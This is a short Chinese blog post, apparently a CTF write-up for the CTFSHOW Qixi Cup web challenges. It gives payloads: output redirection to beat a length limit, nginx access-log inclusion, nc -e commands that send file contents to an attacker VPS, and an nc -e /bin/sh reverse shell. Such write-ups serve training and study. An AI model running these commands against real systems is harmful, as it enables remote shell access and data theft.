您当前的位置: 首页 > 

yu22x

暂无认证

  • 5浏览

    0关注

    109博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

CTFSHOW七夕杯web

yu22x 发布时间:2022-08-05 21:02:25 ,浏览量:5

文章目录
    • web签到
    • easy_cmd
    • easy_cmd
    • easy_sql

web签到

有长度限制 payload

ls />a
nl /*>a

然后访问a即可得到flag

easy_cmd

payload

num1=1;include "/var/log/nginx/access.log";&symbol=-&num2=3

然后就是日志包含那一套 在这里插入图片描述

easy_cmd

通过nc -e向自己的vps传递命令

nc x.x.x.x port -e ls /
nc x.x.x.x port -e cat /secert

也可以直接反弹个shell

nc x.x.x.x port -e /bin/sh
easy_sql

还在看 🌚

关注
打赏
1617522777
查看更多评论
立即登录/注册

微信扫码登录

0.0395s